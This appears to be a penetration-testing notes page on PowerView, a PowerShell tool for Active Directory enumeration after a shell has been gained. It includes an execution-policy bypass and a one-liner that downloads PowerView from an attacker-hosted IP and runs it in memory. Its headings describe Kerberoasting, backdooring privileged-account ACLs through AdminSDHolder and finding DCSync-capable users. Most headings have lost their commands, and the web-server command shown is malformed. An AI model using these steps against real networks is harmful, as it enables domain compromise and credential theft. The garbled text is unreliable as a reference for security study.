githubEdit

PowerView

Powerview

  • Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after you have already gained a shell in the system.

  • Start Powershell - powershell -ep bypass -ep bypasses the execution policy of powershell allowing you to easily run scripts

  • Transfer PowerView to the target box (see file transfers page)

  • Start PowerView

. .\Downloads\PowerView.ps1

Load into Memory

  • Host remotely

python3 -c http.server 8000
#pull down on victim machine 
iwr http://<hosting-ip>:8000/PowerView.ps1 | IEX

See system info

systeminfo

Enumerate the domain users

Get-NetUser | select cn

Enumerate the domain groups

See shared folders

See Full network information

See the operating systems running

Get all the groups a user is effectively a member of, 'recursing up' using tokenGroups

Get all the effective members of a group, 'recursing down'

Use an alterate creadential for any function

Get GPO Display Name

Retrieve all the computer dns host names a GPP password applies to

Get all users with passwords changed > 1 year ago, returning sam account names and password last set times

All enabled users, returning distinguishednames

All disabled users

All users that require smart card authentication

All users that don't require smart card authentication, only returning sam account names

Use multiple identity types for any -Domain function

Find all users with an SPN set (likely service accounts)

Check for users who don't have kerberos preauthentication set

Find all service accounts in "Domain Admins"

Find users with sidHistory set

Find any users/computers with constrained delegation st

Enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation

Return the local groups of a remote server

Return the local group members of a remote server using Win32 API methods (faster but less info)

Kerberoast any users in a particular OU with SPNs set

Enumerate servers that allow unconstrained Kerberos delegation and show all users logged in

Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation

Find all computers in a given OU

Get the logged on users for all machines in any server OU in a particular domain

Enumerate all gobal catalogs in the forest

Turn a list of computer short names to FQDNs, using a global catalog

Enumerate the current domain controller policy

Enumerate the current domain policy

Enumerate what machines that a particular user/group identity has local admin rights to

Enumerate what machines that a given user in the specified domain has RDP access rights to

Export a csv of all GPO mappings

Use alternate credentials for searching for files on the domain

  • Find-InterestingDomainShareFile == old Invoke-FileFinder

Enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names

Grant user 'will' the rights to change 'matt's password

Audit the permissions of AdminSDHolder, resolving GUIDs

Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse

Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)

Find linked DA accounts using name correlation

Save a PowerView object to disk for later usage

Find any machine accounts in privileged groups

Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights

Find all policies applied to a current machine

Enumerate all groups in a domain that don't have a global scope, returning just group names

Enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships

  • Query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames

  • If running in -sta mode, impersonate another credential a la "runas /netonly"

  • Enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer

Set the specified property for the given user identity

Set the owner of 'dfm' in the current domain to 'harmj0y'

Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)

Check if any user passwords are set

Last updated